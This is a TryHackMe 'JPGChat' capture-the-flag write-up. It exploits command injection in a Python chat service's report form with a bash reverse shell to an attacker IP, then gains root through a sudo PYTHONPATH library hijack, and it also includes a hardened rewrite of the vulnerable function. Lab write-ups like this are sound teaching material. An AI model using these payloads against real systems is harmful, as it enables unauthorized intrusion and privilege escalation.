THM: JPGChat
JPGChat
Exploiting a poorly made custom chatting service written in a certain language…
The picture attached with this new room is the Python symbol, so I think we can guess what the language might be.
Ports
SSH and port 3000. What’s that?
3000
Let’s try telnet:
└─# telnet 10.10.228.16 3000
Trying 10.10.228.16...
Connected to 10.10.228.16.
Escape character is '^]'.
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
[MESSAGE]
Connection closed by foreign host.
Oooooookkkkk.
Netcat:
┌──(root💀kali)-[/opt/thm/jpgchat]
└─# nc 10.10.228.16 3000
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
[MESSAGE]
There are currently 0 other users logged in
[MESSAGE]: something
[MESSAGE]: somethingelse
Netcat it is then.
If we send [REPORT], we get this:
this report will be read by Mozzie-jpg
Let’s assume this is our admin and go looking for the source code on GitHub.
Google says:
No results found for “Mozzie-jpg” site:github.com.
Let’s go there directly: https://github.com/Mozzie-jpg/
Bingo. We want this.
#!/usr/bin/env python3
import os
print ('Welcome to JPChat')
print ('the source code of this service can be found at our admin\'s github')
def report_form():
    print ('this report will be read by Mozzie-jpg')
    your_name = input('your name:\n')
    report_text = input('your report:\n')
    os.system("bash -c 'echo %s > /opt/jpchat/logs/report.txt'" % your_name)
    os.system("bash -c 'echo %s >> /opt/jpchat/logs/report.txt'" % report_text)
def chatting_service():
    print ('MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel')
    print ('REPORT USAGE: use [REPORT] to report someone to the admins (with proof)')
    message = input('')
    if message == '[REPORT]':
        report_form()
    if message == '[MESSAGE]':
        print ('There are currently 0 other users logged in')
        while True:
            message2 = input('[MESSAGE]: ')
            if message2 == '[REPORT]':
                report_form()
chatting_service()
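A hardened replacement for report_form(), added here as an example and not code from the room or from Mozzie-jpg's repository: it keeps the same prompts and log file but writes with plain file I/O instead of os.system("bash -c ..."), so nothing in the name or report fields is ever parsed by a shell. The length cap, the control-character filter and the run_demo() helper are assumptions of this example.

```python
#!/usr/bin/env python3
"""Hardened report_form(): same prompts, same log file, but no shell involved."""
import os
import re
import tempfile

# Assumptions for this example (not from the room): cap each field and keep the
# original log location as the default.
MAX_FIELD_LEN = 512
DEFAULT_LOG = "/opt/jpchat/logs/report.txt"
_CONTROL = re.compile(r"[\x00-\x08\x0b-\x1f\x7f]")  # keep tab; CR/LF handled below


def sanitize(field: str) -> str:
    """Flatten line breaks and strip control bytes so one report is one fixed pair of lines."""
    field = field.replace("\r", " ").replace("\n", " ")
    return _CONTROL.sub("", field)[:MAX_FIELD_LEN]


def write_report(your_name: str, report_text: str, log_path: str = DEFAULT_LOG) -> str:
    """Append the report with plain file I/O. Because no command string is built,
    '&&', ';', '|' or '$(...)' in the input are just bytes in the log. Returns the record."""
    record = f"name: {sanitize(your_name)}\nreport: {sanitize(report_text)}\n"
    # Create with owner-only permissions; O_APPEND places every write at the end of the file.
    fd = os.open(log_path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o600)
    with os.fdopen(fd, "w", encoding="utf-8") as f:
        f.write(record)
    return record


def report_form(log_path: str = DEFAULT_LOG) -> str:
    """Drop-in replacement for the original function, with the original prompts."""
    print("this report will be read by Mozzie-jpg")
    your_name = input("your name:\n")
    report_text = input("your report:\n")
    return write_report(your_name, report_text, log_path)


def run_demo() -> str:
    """Feed constructed hostile input through write_report() and return the resulting log."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "report.txt")
        write_report("me && id", "proof", path)   # shell metacharacters in the name field
        write_report("a\r\nb", "c\x00d", path)     # CRLF and a NUL byte
        with open(path, encoding="utf-8") as f:
            return f.read()


if __name__ == "__main__":
    print(run_demo(), end="")
```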
We can see that report_form() drops both inputs straight into a bash -c command string via os.system() with no quoting, so the report is vulnerable to command injection. Like so:
┌──(root💀kali)-[/opt/thm/jpgchat]
└─# nc 10.10.228.16 3000
Welcome to JPChat
the source code of this service can be found at our admin's github
MESSAGE USAGE: use [MESSAGE] to message the (currently) only channel
REPORT USAGE: use [REPORT] to report someone to the admins (with proof)
[REPORT]
this report will be read by Mozzie-jpg
your name:
me && bash -i >& /dev/tcp/10.9.10.123/1234 0>&1
your report:
For some reason this doesn’t want to give me a very nice shell, so I just use it to send myself a better one:
┌──(root💀kali)-[/opt/thm/jpgchat]
└─# nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.9.10.123] from (UNKNOWN) [10.10.228.16] 57436
bash: cannot set terminal process group (1688): Inappropriate ioctl for device
bash: no job control in this shell
wes@ubuntu-xenial:/$ id
id
wes@ubuntu-xenial:/$ bash -i >& /dev/tcp/10.9.10.123/1235 0>&1
bash -i >& /dev/tcp/10.9.10.123/1235 0>&1
A better shell
wes@ubuntu-xenial:/$ id
id
uid=1001(wes) gid=1001(wes) groups=1001(wes)
wes@ubuntu-xenial:/$ which python
which python
/usr/bin/python
wes@ubuntu-xenial:/$ python -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
wes@ubuntu-xenial:/$ sudo -l
sudo -l
Matching Defaults entries for wes on ubuntu-xenial:
mail_badpass, env_keep+=PYTHONPATH
User wes may run the following commands on ubuntu-xenial:
(root) SETENV: NOPASSWD: /usr/bin/python3 /opt/development/test_module.py
We’d better have a look at that script, then:
#!/usr/bin/env python3
from compare import *
print(compare.Str('hello', 'hello', 'hello'))
Not much to it. Let’s go!
wes@ubuntu-xenial:~$ printf 'import os\nos.system("/bin/bash")\n' >> compare.py
< 'import os\nos.system("/bin/bash")\n' >> compare.py
wes@ubuntu-xenial:~$ cat compare.py
cat compare.py
import os
os.system("/bin/bash")
wes@ubuntu-xenial:~$ chmod +x compare.py
wes@ubuntu-xenial:~$ sudo -u root PYTHONPATH=./:${PYTHONPATH} /usr/bin/python3 /opt/development/test_module.py
root@ubuntu-xenial:~# cd /root
cd /root
root@ubuntu-xenial:/root#
# etc, read flag blah blah